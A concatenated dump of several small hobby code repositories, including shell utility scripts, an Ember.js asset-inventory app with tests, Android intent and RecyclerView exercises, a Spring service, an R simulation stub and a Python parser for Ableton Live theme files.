rm *.synctex.gz 2> /dev/null
rm *.synctex.gz\(busy\) 2> /dev/null
rm *.toc 2> /dev/null
rm *-blx.bib 2> /dev/null
echo "> Done!"
<file_sep>#!/usr/bin/sh
# Written by: <NAME>
# Description: Fixes scanned PDFs whose pages came out rotated.
# A 158-page book: rotate even pages 270 degrees and odd pages 90 degrees
for i in $(seq 158);
do
if [ $(($i%2)) -eq '0' ]; then
pdf270 source.pdf $i --outfile pagina$i.pdf;
else
pdf90 source.pdf $i --outfile pagina$i.pdf;
fi
done
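# Note (illustrative): the three separate globs below (pagina?.pdf,
# pagina??.pdf, pagina???.pdf) make the pages concatenate in numeric
# order (1-9, then 10-99, then 100-158) instead of lexicographic order.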
pdfjam pagina?.pdf pagina??.pdf pagina???.pdf --landscape --outfile output.pdf
rm pagina*.pdf
<file_sep>#!/bin/bash
#Folder with a list of images named teste1.bmp, teste2.bmp, ...
echo " "
echo "Convirtindo..."
echo " "
mencoder "mf://teste%d.bmp" -mf fps=15 -o out.avi -ovc lavc -lavcopts vcodec=mpeg4:vbitrate=800
echo " "
echo "Done!"
echo " "
<file_sep>#!/usr/bin/sh
# Written by: <NAME>
# Description: Renders .pov (POV-Ray) scene files
if [ "$#" -eq 0 ]; then
echo "Usage: pov.sh [OPTION] file"
echo "Renders a POV-Ray scene file. Run without arguments to show this help."
echo ""
echo "Valid options:"
echo "fast - quick render"
echo "best - best-quality render"
else
case $1 in
"fast") povray +w800 +h600 $2;;
"best") povray +A0.0 +Q9 +R9 +w800 +h600 $2;;
*) echo "Unknown option! Run \"pov.sh\" without parameters to see the list of options";;
esac
fi
<file_sep># Converts every .tex file in the current directory from ISO-8859-1 to UTF-8
for file in *.tex; do
iconv -f iso8859-1 -t utf-8 "$file" -o "${file%.tex}.out.tex"
done
<file_sep>Shell Scripts
Console tools for various purposes.
---
<NAME>.
<NAME>
<file_sep>#!/bin/bash
echo " "
echo "*** Getting CD information... ***"
echo " "
cdparanoia -vsQ
echo " "
echo "*** Ripping the tracks, uncompressed at first... ***"
echo " "
cdparanoia -B
echo " "
echo "*** Converting the files to mp3 format ***"
echo " "
# A single glob handles any number of tracks, so the hardcoded
# track0{1..9}/track{1..15} brace ranges (which broke when the track
# count varied) are no longer needed.
for t in track*.wav; do lame -b160 "$t"; done
echo " "
echo "*** Deleting the uncompressed files... ***"
rm *.wav
echo " "
echo "Done!"
echo " "
|
f5709e2e87e4451d15dd9d08b43006f21ffa9674
|
[
"Markdown",
"Shell"
] | 8 |
Shell
|
thomazrb/shellscript
|
a9c1500a2b4269371f898cc343b4bf008a874d7a
|
e839a1e136994a48ce1f1aa08a85fc6a49159378
|
refs/heads/master
|
<repo_name>Subaku/mirage-issue<file_sep>/tests/integration/helpers/semantic-date-test.js
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render } from '@ember/test-helpers';
import hbs from 'htmlbars-inline-precompile';
module('Integration | Helper | semantic-date', function(hooks) {
setupRenderingTest(hooks);
let dt = '2019-12-05T12:27:08Z';
hooks.beforeEach(function() {
this.set('dtStr', dt);
});
test('it renders to default format', async function(assert) {
await render(hbs`{{semantic-date dtStr}}`);
assert.dom('time').hasAttribute('datetime', dt);
assert.dom('time').hasText('12:27pm 12/05');
});
test('it renders with given format', async function(assert) {
await render(hbs`{{semantic-date dtStr fmt="YYYY/DD/MM hh"}}`);
assert.dom('time').hasAttribute('datetime', dt);
assert.dom('time').hasText('2019/05/12 12');
});
test('it renders for given timezone', async function(assert) {
await render(hbs`{{semantic-date dtStr tz="US/Eastern"}}`);
assert.dom('time').hasAttribute('datetime', dt);
assert.dom('time').hasText('7:27am 12/05');
});
});
<file_sep>/tests/integration/components/constants.js
export const visionOptions = [
'Seen',
'Not Seen'
];
export const timeTypes = [
'days',
'hours'
];
<file_sep>/app/adapters/application.js
import DRFAdapter from './drf';
export default class ApplicationAdapter extends DRFAdapter {
pathForType(type) {
// No pluralization
return type;
}
}
<file_sep>/app/serializers/asset-location-summary.js
import DS from 'ember-data';
import { isNone } from '@ember/utils';
import ApplicationSerializer from './application';
const { EmbeddedRecordsMixin } = DS;
export default class AssetLocationSummarySerializer extends ApplicationSerializer.extend(EmbeddedRecordsMixin) {
attrs = {
location: { embedded: 'always' }
};
// extractId(modelClass, resourceHash) {
// return isNone(resourceHash['location']) ? -1 : resourceHash['location']['id'];
// }
}
<file_sep>/mirage/factories/asset.js
import { Factory } from 'ember-cli-mirage';
import faker from 'faker';
export default Factory.extend({
name() {
return faker.lorem.word();
},
assetType() {
return faker.lorem.word();
},
assetId() {
return faker.lorem.word();
},
category(i) {
return i % 2 === 0 ? 'Tool' : 'Equipment';
},
value() {
return Math.floor(Math.random() * 3000);
},
url(i) {
return `http://example.com/asset/${i}/`;
}
});
<file_sep>/mirage/factories/asset-location.js
import * as moment from 'moment';
import { Factory } from 'ember-cli-mirage';
export default Factory.extend({
whenSeen() {
let now = moment.utc();
let days = Math.floor(Math.random() * (25 - 1 + 1) + 1);
let hours = Math.floor(Math.random() * (23 + 1));
let minutes = Math.floor(Math.random() * (59 + 1));
now.subtract(minutes, 'minutes');
now.subtract(hours, 'hours');
now.subtract(days, 'days');
    return now.format();
},
afterCreate(assetLocation, server) {
let toUpdate = {};
if (!assetLocation.asset) {
toUpdate.asset = server.create('asset');
}
if (!assetLocation.location) {
toUpdate.location = server.create('place');
}
if (!assetLocation.assignedTo) {
toUpdate.assignedTo = server.create('place');
}
if (!assetLocation.seenBy) {
toUpdate.seenBy = server.create('place');
}
assetLocation.update(toUpdate);
}
});
<file_sep>/app/models/asset-location-summary.js
import { computed } from '@ember/object';
import DS from 'ember-data';
const { Model, attr, belongsTo } = DS;
export default class AssetLocationSummary extends Model{
@belongsTo('place') location;
@attr('number') assets;
@attr('number') assignedAssets;
@attr('number') assetValue;
@attr('number') assignedAssetValue;
@computed('assignedAssets')
get nonAssignedAssets() {
return this.get('assets') - this.get('assignedAssets');
}
@computed('assignedAssetValue')
get nonAssignedAssetValue() {
return this.get('assetValue') - this.get('assignedAssetValue');
}
}
<file_sep>/app/models/asset-location.js
import DS from 'ember-data';
const { Model, attr, belongsTo } = DS;
export default class AssetLocation extends Model{
@belongsTo('asset') asset;
@belongsTo('place', { inverse: null }) location;
@belongsTo('place', { inverse: null }) assignedTo;
@belongsTo('place', { inverse: null }) seenBy;
@attr('string') whenSeen;
}
<file_sep>/app/serializers/place.js
import ApplicationSerializer from './application';
export default class PlaceSerializer extends ApplicationSerializer {
}
<file_sep>/app/helpers/semantic-date.js
import { helper } from '@ember/component/helper';
import { htmlSafe } from '@ember/string';
import * as moment from 'moment-timezone';
export default helper(function semanticDate([value], {fmt='h:mma MM/DD', tz=null}) {
  let formattedDate = tz === null ? moment.utc(value).format(fmt) : moment.utc(value).tz(tz).format(fmt);
  return htmlSafe(`<time datetime="${value}">${formattedDate}</time>`);
});
<file_sep>/app/components/asset-location-summaries/locations.js
import Component from '@ember/component';
export default class Locations extends Component {
}
<file_sep>/mirage/factories/place.js
import { Factory } from 'ember-cli-mirage';
import faker from 'faker';
let levelToIcon = {
0: 'icon-organization',
1: 'icon-yard',
2: [
'icon-bkt-truck',
'icon-crew',
'icon-room',
'icon-foreman-truck',
'icon-heavy-foreman-truck',
'icon-line-truck',
'icon-sqt-truck',
'icon-pump-truck',
],
3: [
'icon-bkt-truck',
'icon-foreman-truck',
'icon-heavy-foreman-truck',
'icon-line-truck',
'icon-sqt-truck',
'icon-pump-truck',
]
}
export default Factory.extend({
name() {
return faker.address.city();
},
level() {
// Level 1-3
return Math.floor(Math.random() * 2 + 1);
},
lft(i) {
return i;
},
url(i) {
return `http://example.com/place/${i}/`;
},
icon() {
let icons = levelToIcon[this.level];
if (typeof icons === 'string' ) {
return icons;
} else {
return icons[Math.floor(Math.random() * icons.length)]
}
}
});
<file_sep>/app/helpers/humanize-date.js
import { helper } from '@ember/component/helper';
import * as moment from 'moment-timezone';
export default helper(function humanizeDate([value]) {
return moment.utc(value).fromNow();
});
<file_sep>/app/utils/filter-utils.js
export function parseTimeTerm(term) {
let parts = term.split(/\s+/, 1);
// parseInt will extract out number from strings like '32something something'
let parsedInt = parseInt(parts[0]);
  let intPart = Number.isInteger(parsedInt) ? parsedInt : null;
  let theRest = term.replace(intPart, '');
  return [intPart, theRest];
}
export function joinTimeParts(int, timePart) {
return `${int} ${timePart.trim()}`;
}
<file_sep>/mirage/scenarios/default.js
export default function(server) {
/*
Seed your development database using your factories.
This data will not be loaded in your tests.
*/
server.createList('place', 35);
// server.createList('asset', 5);
server.createList('assetLocationSummary', 8).forEach(summary => {
server.createList('assetLocation', 15, { location: summary.location });
});
}
<file_sep>/app/constants.js
// Options to pass to last-seen-filter component
export const VISION_VALUES = ['Seen', 'Not Seen'];
export const TIME_TYPES = ['hours', 'days'];
// Utility parseWhenSeen returns array of values.
export const VISION_I = 0;
export const TIME_VALUE_I = 1;
export const TIME_TYPE_I = 2;
export const WHEN_SEEN_SEP = '-';
export const QUERY_LOOKUP_SEP = '__';
<file_sep>/app/components/asset-location-summaries.js
import Component from '@ember/component';
import { readOnly, notEmpty, mapBy, sum } from '@ember/object/computed';
import { action, computed } from '@ember/object';
export default class AssetLocationSummaries extends Component {
@readOnly('summariesTask.value') summaries;
@readOnly('summariesTask.isRunning') isSummariesLoading;
assetLocationsTask = null;
selectedLocation = null;
@readOnly('assetLocationsTask.isRunning') isAssetLocationsLoading;
@readOnly('assetLocationsTask.value') assetLocations;
@notEmpty('assetLocations') showAssetLocations;
@mapBy('assetLocations', 'asset') locationAssets;
@mapBy('locationAssets', 'value') assetValues;
@sum('assetValues') totalAssetValue;
/***** Getters ******/
@computed('summaries.[]')
get summariesAsRows() {
// Something about Ember-Data's RecordArray stuff throws Ember Table off...
return this.summaries.toArray();
}
@computed('locationAssets.[]')
get totalTools() {
return this.locationAssets.reduce((total, asset) => {
return total + (asset.get('isTool') ? 1 : 0);
}, 0)
}
@computed('locationAssets.[]')
get totalEquipment() {
return this.locationAssets.reduce((total, asset) => {
return total + (asset.get('isEquipment') ? 1 : 0);
}, 0)
}
/***** Actions ******/
@action
viewAssetLocations(forLocation) {
this.set('assetLocationsTask', this.get('fetchAssetLocations')(forLocation));
this.set('selectedLocation', forLocation);
}
@action
stopViewingAssetLocations() {
this.set('assetLocationsTask', null);
this.set('selectedLocation', null);
}
}
<file_sep>/app/controllers/index.js
import Controller from '@ember/controller';
import { action } from '@ember/object';
import { task } from 'ember-concurrency';
import { normalizeAssetLocationParams } from 'inventory/utils/query-params';
export default class Index extends Controller{
/***** Tasks ******/
@task(function * (forLocation) {
// query = Object.assign(query, {location: forLocation.get('id')});
// return yield this.store.query('asset-location', query);
return yield this.store.findAll('asset-location');
}).restartable() fetchAssetLocationsTask;
/***** Actions ******/
@action
fetchAssetLocations(forLocation) {
return this.fetchAssetLocationsTask.perform(forLocation);
}
}
<file_sep>/app/serializers/asset-location.js
import DS from "ember-data";
import ApplicationSerializer from './application';
const { EmbeddedRecordsMixin } = DS;
export default class AssetLocationSerializer extends ApplicationSerializer.extend(EmbeddedRecordsMixin) {
attrs = {
asset: { embedded: 'always' },
assignedTo: { embedded: 'always' },
location: { embedded: 'always' },
seenBy: { embedded: 'always' },
}
}
<file_sep>/app/components/asset-location-summaries/summaries-table.js
import Component from '@ember/component';
export default class SummariesTable extends Component {
classNames = ['summaries-table'];
summaryColumns = [
{name: 'Location', slug: 'location'},
{name: 'Inventory', slug: 'inventory'},
{name: 'Non-Assigned Inventory', slug: 'non-assigned'},
{name: '', slug: 'actions'},
];
didInsertElement() {
// EmberTable doesn't have any way to access the <table></table> element itself so we resort to
// this in order to hook it up to Bootstrap's CSS.
this.element.querySelector('table').classList.add('table', 'table-condensed');
}
}
<file_sep>/mirage/factories/asset-location-summary.js
import { Factory } from 'ember-cli-mirage';
export default Factory.extend({
summary: 'thing',
assets() {
return Math.floor(Math.random() * 30);
},
assignedAssets() {
return Math.floor(Math.random() * this.assets);
},
assetValue() {
return Math.floor(Math.random() * 300000);
},
assignedAssetValue() {
return Math.floor(Math.random() * this.assetValue);
},
afterCreate(assetLocation, server) {
assetLocation.update({location: server.create('place')});
}
});
<file_sep>/mirage/serializers/asset-location.js
import ApplicationSerializer from './application';
export default ApplicationSerializer.extend({
include: ['location', 'asset', 'assignedTo', 'seenBy'],
});
<file_sep>/app/models/asset.js
import DS from 'ember-data';
import { match } from '@ember/object/computed';
const { Model, attr } = DS;
export default class Asset extends Model{
@attr('string') name;
@attr('string') assetType;
@attr('string') assetId;
@attr('string') category;
@attr('number') value;
// Url to this asset's detail page
@attr('string') url;
@match('category', /Equipment/) isEquipment;
@match('category', /Tool/) isTool;
}
<file_sep>/tests/unit/controllers/index-test.js
import { module, test } from 'qunit';
import { setupTest } from 'ember-qunit';
module('Unit | Controller | index', function(hooks) {
setupTest(hooks);
test('updates timeValue on timeValueChanged action', function(assert) {
let controller = this.owner.lookup('controller:index');
assert.strictEqual(controller.get('timeValue'), null)
controller.send('timeValueChanged', 100);
assert.strictEqual(controller.get('timeValue'), 100)
});
test('updates timeType on timeTypeChanged action', function(assert) {
let controller = this.owner.lookup('controller:index');
assert.strictEqual(controller.get('timeType'), null)
controller.send('timeTypeChanged', 'days');
assert.strictEqual(controller.get('timeType'), 'days')
});
test('updates visionValue on visionValueChanged action', function(assert) {
let controller = this.owner.lookup('controller:index');
assert.strictEqual(controller.get('visionValue'), null)
controller.send('visionValueChanged', 'Seen');
assert.strictEqual(controller.get('visionValue'), 'Seen')
});
});
<file_sep>/tests/unit/utils/filter-utils-test.js
import { module, test } from 'qunit';
import { parseTimeTerm, joinTimeParts } from 'inventory/utils/filter-utils';
module('Unit | Utility | filter-utils | parseTimeTerm', function() {
test('correctly parses apart the term', function(assert) {
let [int, theRest] = parseTimeTerm('23thingie');
assert.strictEqual(int, 23);
assert.strictEqual(theRest, 'thingie');
});
test('correctly parses apart slightly more complicated term', function(assert) {
let [int, theRest] = parseTimeTerm('23 and a one and a two');
assert.strictEqual(int, 23);
assert.strictEqual(theRest, ' and a one and a two');
});
test('correctly handles term not beginning with a number', function(assert) {
let [int, theRest] = parseTimeTerm('a term');
assert.strictEqual(int, null);
assert.strictEqual(theRest, 'a term');
});
test('correctly handles term not having anything else but a number', function(assert) {
let [int, theRest] = parseTimeTerm('32');
assert.strictEqual(int, 32);
assert.strictEqual(theRest, '');
});
test('returns empty values when given an empty string', function(assert) {
let [int, theRest] = parseTimeTerm('');
assert.strictEqual(int, null);
assert.strictEqual(theRest, '');
});
});
module('Unit | Utility | filter-utils | joinTimeParts', function() {
test('correctly joins together the given data', function(assert) {
assert.strictEqual(joinTimeParts(55, 'thingy thing'), '55 thingy thing');
});
test('handles the string part with extra white spaces', function(assert) {
assert.strictEqual(joinTimeParts(55, ' thingy thing '), '55 thingy thing');
});
});
<file_sep>/tests/integration/helpers/humanize-date-test.js
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render } from '@ember/test-helpers';
import hbs from 'htmlbars-inline-precompile';
import * as moment from 'moment-timezone';
module('Integration | Helper | humanize-date', function(hooks) {
setupRenderingTest(hooks);
let dt = '2019-12-07T10:05:00Z';
hooks.beforeEach(function() {
this.set('dtStr', dt);
})
test('it renders properly', async function(assert) {
await render(hbs`{{humanize-date dtStr}}`);
assert.equal(this.element.textContent.trim(), moment.utc(dt).fromNow());
});
});
<file_sep>/app/helpers/format-currency.js
import { helper } from '@ember/component/helper';
import { isNone, isEmpty } from '@ember/utils';
const SIGN = '$';
export default helper(function formatCurrency([value]) {
if (isNone(value)) {
return '';
}
if (value > 999) {
let asStr = value.toString();
let reversed = asStr.split('').reverse().join('');
    // The capturing group keeps its matches in split()'s output, so filter out the empty strings
let justDigitsAsStr = reversed.split(/(\d{3})/).filter(part => !isEmpty(part));
value = justDigitsAsStr.join(',').split('').reverse().join('');
}
return `${SIGN}${value}`;
});
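For illustration, the grouping trick used above — reverse the digits, split them into chunks of three, join with commas, and reverse back — ported to a standalone Python sketch (the function name is hypothetical; the app itself uses the JS helper above):

```python
def format_currency(value, sign="$"):
    """Group digits in threes from the right, e.g. 1234567 -> $1,234,567."""
    if value is None:
        return ""
    digits = str(value)
    if value > 999:
        reversed_digits = digits[::-1]
        # chunk the reversed digits in threes, mirroring the /(\d{3})/ split above
        groups = [reversed_digits[i:i + 3] for i in range(0, len(reversed_digits), 3)]
        digits = ",".join(groups)[::-1]
    return f"{sign}{digits}"
```

`format_currency(1234567)` returns `"$1,234,567"`, matching the JS helper's output.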
<file_sep>/tests/integration/components/last-seen-filter-test.js
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render, click } from '@ember/test-helpers';
import hbs from 'htmlbars-inline-precompile';
import { typeInSearch } from 'ember-power-select/test-support/helpers';
import { clickTrigger } from '../../helpers/eps-helper-overrides';
import { joinTimeParts } from 'inventory/utils/filter-utils';
import { visionOptions, timeTypes } from './constants';
module('Integration | Component | last-seen-filter', function(hooks) {
setupRenderingTest(hooks);
let timeTypeSelectTrigger = '.time-type-select';
let timeTypeSelectDropdown = '.time-type-select-dropdown';
let visionSelectTrigger = '.vision-select';
// let visionSelectDropdown = '.vision-select-dropdown';
let noTimeTypeMsg = 'Enter a number followed by \'hours\' or \'days\'';
test('renders with values', async function(assert) {
assert.expect(2);
this.visionOptions = visionOptions;
this.timeTypes = timeTypes;
this.visionValue = this.visionOptions[0];
this.timeType = this.timeTypes[0];
this.timeValue = 32;
await render(hbs`
<LastSeenFilter
@visionOptions={{visionOptions}}
@timeTypes={{timeTypes}}
@visionValue={{visionValue}}
@timeValue={{timeValue}}
@timeType={{timeType}}
@onTimeValueChanged={{action (mut timeValue)}}
@onTimeTypeChanged={{action (mut timeType)}}
@onVisionChanged={{action (mut visionValue)}}/>
`);
assert.dom(visionSelectTrigger).includesText(this.visionValue);
assert.dom(timeTypeSelectTrigger).includesText(joinTimeParts(this.timeValue, this.timeType));
});
test('only allows selection of time type once user enters first a number', async function(assert) {
assert.expect(5);
this.timeTypes = timeTypes;
await render(hbs`
<LastSeenFilter
@timeTypes={{timeTypes}}
@timeValue={{timeValue}}
@timeType={{timeType}}
@onTimeValueChanged={{action (mut timeValue)}}
@onTimeTypeChanged={{action (mut timeType)}}
@onVisionChanged={{action (mut visionValue)}}/>
`);
let optionsSelector = `${timeTypeSelectDropdown} .ember-power-select-option`;
await clickTrigger(timeTypeSelectTrigger);
assert.dom(optionsSelector).includesText(noTimeTypeMsg);
await typeInSearch(timeTypeSelectTrigger, 'ello');
assert.dom(optionsSelector).includesText(noTimeTypeMsg);
await typeInSearch(timeTypeSelectTrigger, 10);
assert.dom(optionsSelector).doesNotIncludeText(noTimeTypeMsg);
assert.dom(`${optionsSelector}:nth-child(1)`).includesText(this.timeTypes[0]);
assert.dom(`${optionsSelector}:nth-child(2)`).includesText(this.timeTypes[1]);
});
test('user is not allowed to select more than one thing', async function(assert) {
assert.expect(1);
this.timeTypes = timeTypes;
await render(hbs`
<LastSeenFilter
@timeTypes={{timeTypes}}
@timeValue={{timeValue}}
@timeType={{timeType}}
@onTimeValueChanged={{action (mut timeValue)}}
@onTimeTypeChanged={{action (mut timeType)}}
@onVisionChanged={{action (mut visionValue)}}/>
`);
await clickTrigger(timeTypeSelectTrigger);
await typeInSearch(timeTypeSelectTrigger, 5);
let optionsSelector = `${timeTypeSelectDropdown} .ember-power-select-option`;
await click(`${optionsSelector}:nth-child(1)`);
let optionSelector = `${timeTypeSelectTrigger} .ember-power-select-multiple-option`;
assert.dom(optionSelector).includesText('5 days');
});
});
|
8a0d5c39ffa48f68a2bd3e708360705f079a5561
|
[
"JavaScript"
] | 28 |
JavaScript
|
Subaku/mirage-issue
|
934670b1470ca8e3605a1712f8f8f76c759da341
|
22a607a3179b37c677bd3d325ed8ca5d8d565de6
|
refs/heads/main
|
<file_sep># WSMobileAplication
Name : <NAME>
NIM : E41200378 / A
Week 4 mobile workshop assignment submission
1. ListView output

2. Spinner and AutoCompleteText output

3. RecyclerView widget

(Week 5: Fragment)
Name : <NAME>, NIM : E41200378 / A



(Week 6: Intent)
1. Explicit Intent

2. Implicit Intent, and the result of running it linked to Instagram


(Week 7 assignment: file management and SQLite)


<file_sep>package com.example.impintent;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;
public class SecondActivity extends AppCompatActivity {
    TextView tvnama, tvnim; // holds the data received from the main activity
    Button btnweb; // button that opens a web link
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_second);
        tvnama = findViewById(R.id.tv_nama); // bind the TextViews to their layout ids
tvnim = findViewById(R.id.tv_nim);
//explicit intent
        Intent terima = getIntent(); // get the Intent (and its data) that started this activity
        String terimanama = terima.getStringExtra("kirimnama"); // read the extras sent by the main activity
String terimanim = terima.getStringExtra("kirimnim");
//implicit intent
        tvnama.setText(terimanama); // show the received data in the TextViews
tvnim.setText(terimanim);
        btnweb = findViewById(R.id.goto_link); // bind the button to its layout id
        btnweb.setOnClickListener(new View.OnClickListener() { // attach a click action to the button
@Override
public void onClick(View view) {
                String url = "https://www.instagram.com/buildwithangga/"; // the website address to open
                Intent bukawebsite = new Intent(Intent.ACTION_VIEW); // create an implicit VIEW intent
                bukawebsite.setData(Uri.parse(url)); // parse the URL into a Uri Android can handle
                startActivity(bukawebsite); // launch the intent
}
});
}
}<file_sep>package com.example.recycleviewdatamovies;
import android.content.Intent;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.recyclerview.widget.RecyclerView;
import java.util.ArrayList;
public class MoviesRecycleViewAdapter extends RecyclerView.Adapter<MoviesRecycleViewAdapter.MovieViewHolder> {
ArrayList<Movies> arrayListMovies;
public MoviesRecycleViewAdapter(ArrayList<Movies> arrayListMovies){
this.arrayListMovies= arrayListMovies;
}
@NonNull
@Override
public MoviesRecycleViewAdapter.MovieViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
        // inflate the item layout from item.xml
View view = LayoutInflater.from(parent.getContext()).inflate(R.layout.item,parent,false);
return new MovieViewHolder(view);
}
@Override
public void onBindViewHolder(@NonNull MoviesRecycleViewAdapter.MovieViewHolder holder, int position) {
        final Movies movies = arrayListMovies.get(position); // fetch the item at this position in the ArrayList
holder.imageView.setImageResource(movies.getImage());
holder.textViewTitle.setText(movies.getTitle());
holder.textViewRating.setText(String.valueOf(movies.getRating()));
holder.textViewReleaseDate.setText(movies.getReleasedate());
        // when an item is clicked, open its detail/description screen
holder.itemView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
                // pass the movie via an Intent so DetailMovieActivity can receive it
Intent intent = new Intent(holder.itemView.getContext(), DetailMovieActivity.class);
intent.putExtra("Movies",movies);
                // start the transition from MainActivity to DetailMovieActivity
holder.itemView.getContext().startActivity(intent);
}
});
}
@Override
public int getItemCount() {
        // return the number of items in the list
return arrayListMovies.size();
}
    // MovieViewHolder is a subclass of RecyclerView.ViewHolder
public class MovieViewHolder extends RecyclerView.ViewHolder {
TextView textViewTitle, textViewRating, textViewReleaseDate;
ImageView imageView;
public MovieViewHolder(@NonNull View itemView) {
super(itemView);
            // bind the views to their layout ids
textViewTitle = itemView.findViewById(R.id.tvTitle);
textViewRating = itemView.findViewById(R.id.tvRating);
textViewReleaseDate = itemView.findViewById(R.id.tvReleaseDate);
imageView = itemView.findViewById(R.id.image);
}
}
}
<file_sep>package com.example.recycleviewdatamovies;
import androidx.appcompat.app.AppCompatActivity;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import android.os.Bundle;
import java.util.ArrayList;
public class MainActivity extends AppCompatActivity {
RecyclerView recyclerView;
MoviesRecycleViewAdapter adapter;
ArrayList<Movies> objMovies = new ArrayList<>();
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
recyclerView = findViewById(R.id.recycleView);
objMovies.add(new Movies("The Suicide Squad","Action, Adventure, Comedy", "<NAME>",7.3 ,"Supervillains <NAME>, Bloodsport, Peacemaker and a collection of nutty cons at Belle Reve prison join the super-secret, super-shady Task Force X as they are dropped off at the remote, enemy-infused island of Corto Maltese." , "6 Agustus 2021" , R.mipmap.ic_launcher));
objMovies.add(new Movies("<NAME>","Action, Adventure","Cate Shortland" , 6.8 ,"<NAME> confronts the darker parts of her ledger when a dangerous conspiracy with ties to her past arises." ,"8 July 2014",R.drawable.blackwdw));
objMovies.add(new Movies("Jumanji" , "Action, Adventure, Comedy", "<NAME>" , 6.9 , "Four teenagers are sucked into a magical video game, and the only way they can escape is to work together to finish the game." ,"4 December 2019." , R.drawable.jumanji));
adapter = new MoviesRecycleViewAdapter(objMovies);
recyclerView.setAdapter(adapter);
recyclerView.setLayoutManager(new LinearLayoutManager(MainActivity.this));
}
}
|
66fe4a44f2cd9f3baf918da90a7340db25e93509
|
[
"Markdown",
"Java"
] | 4 |
Markdown
|
pujirahayu01/WSMobileAplication
|
8125138601c2298acac84cb820d51c2cb35731a4
|
ec1b10d71180d659f3f06cca7881f933810086bd
|
refs/heads/master
|
<repo_name>wanglaozhe/springdata<file_sep>/src/main/java/com/ww/service/UserService.java
package com.ww.service;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import org.springframework.transaction.annotation.Transactional;
import com.ww.entity.Auth;
import com.ww.repository.AuthDao;
// Marks this class as a Spring bean.
@Component
// Puts every public method of this class under transaction management.
@Transactional
public class UserService {
@Autowired
private AuthDao userDao;
/**
     * Save a user.
* @param user
*/
public void saveUser(Auth user){
userDao.save(user);
}
public List<Auth> findAll(){
return (List<Auth>) userDao.findAll();
}
public List<Auth> findUserByUsername(String username){
return userDao.findByUsername(username);
}
public Auth findUserById(long id){
return this.userDao.findById(id);
}
}
|
896e81f0eaad80f68d61940f667d584f6854aa1f
|
[
"Java"
] | 1 |
Java
|
wanglaozhe/springdata
|
8b3b3c9e7299d9b765f588ccc02304ec06672cff
|
d9e83d6c395af3b9138b1af420e507bfcaeeb8be
|
refs/heads/master
|
<repo_name>cwsjitu/secrSimulation<file_sep>/secrCode.R
##set your working directory with
# setwd()
library(secr)
library(raster)
library(rgdal)
library(sp)
library(maptools)
library(rgeos)
library(dplyr)
## coordinate system
latlong = "+init=epsg:4326" ## LatLon Projection
ingrid = "+init=epsg:32643" ## UTM Projection
## assumptions to generate capture history
N <- NA        ## Number of individuals/activity centers (fill in)
traploc <- NA  ## Number of trap locations (fill in)
g0 <- NA       ## value between 0.1 and 0.3 (fill in)
sigma <- NA    ## depends on home range of species (fill in)
occasions <- 10 ## 10 sampling occasions
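The commented parameters above are the inputs to a standard SECR capture-history simulation: each individual gets an activity centre, and detection probability at a trap follows a half-normal function of distance, p = g0 * exp(-d^2 / (2 * sigma^2)). A rough sketch of that generative step in Python (function and argument names are illustrative, not part of the course code):

```python
import math
import random

def simulate_capture_history(centers, traps, g0, sigma, occasions, seed=0):
    """history[i][k][j] = 1 if individual i is detected at trap j on occasion k."""
    rng = random.Random(seed)
    history = []
    for (x, y) in centers:  # one activity centre per individual
        per_occasion = []
        for _ in range(occasions):
            row = []
            for (tx, ty) in traps:
                d2 = (x - tx) ** 2 + (y - ty) ** 2
                p = g0 * math.exp(-d2 / (2 * sigma ** 2))  # half-normal detection
                row.append(1 if rng.random() < p else 0)
            per_occasion.append(row)
        history.append(per_occasion)
    return history
```

With g0 = 1 and a trap placed exactly on an activity centre, every occasion yields a detection; a trap many sigmas away is effectively never visited.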
<file_sep>/README.md
# secrSimulation
PopEstimationCourse
|
efa7bcef12dfe372bfd199bc7d7a87251efe5d2b
|
[
"Markdown",
"R"
] | 2 |
R
|
cwsjitu/secrSimulation
|
62bbb7cfac9e061b68c2c518f93ae50d442410c3
|
766f99b7f5f8bc849d26550108cd26fcdff55303
|
refs/heads/master
|
<file_sep># PurposefulPhp
Familiar, high level programming.
<file_sep><?php
declare(strict_types=1);
namespace StillDreaming1\PurposefulPhp;
final class Contractor
{
}
|
1645f2924ec0ddaee6a53ff7c77cd26024540a5b
|
[
"Markdown",
"PHP"
] | 2 |
Markdown
|
gitter-badger/PurposefulPhp
|
d89658ee9116b77a95b0bc41ffac2a9f54c6561d
|
f936aa94b4043c8649211776536c9cb597513fee
|
refs/heads/main
|
<file_sep># Live 10 Theme File Parser by h1data
# outputs tsv file with color tag and color codes
# confirmed functional with Python 3.7.1
# usage
# python liveThemeParser.py [livethemefile]
import sys
import os
import xml.etree.ElementTree as ET
if len(sys.argv) != 2:
print("usage: python " + sys.argv[0] + " [liveThemeFile]")
sys.exit()
try:
outfile = os.path.splitext(os.path.basename(sys.argv[1]))[0] + "_result.txt"
root = ET.parse(sys.argv[1])
with open(outfile, "w") as f:
for element in root.findall("./SkinManager//R/.."):
R = int(element.find("./R").get("Value"))
G = int(element.find("./G").get("Value"))
B = int(element.find("./B").get("Value"))
f.write(element.tag + "\t" + ("%x" % R).zfill(2) + ("%x" % G).zfill(2) + ("%x" % B).zfill(2) + "\n")
print("output to " + outfile)
except FileNotFoundError:
print("!!ERROR!! unable to read " + sys.argv[1])
<file_sep>## Live 10 Theme File Parser
A simple Python script that parses a Live 10 theme file (*.ask) and outputs a TSV file.<br>
Confirmed operational with Python 3.7.1<br>
### Usage
$ python liveThemeParser.py [live theme file]
### ...so what is this for?
Originally used to analyze the relationship between Live theme colors and live.* objects in Max.<br>
It is not meant for migration to Live 11, but hopefully it helps someone.
|
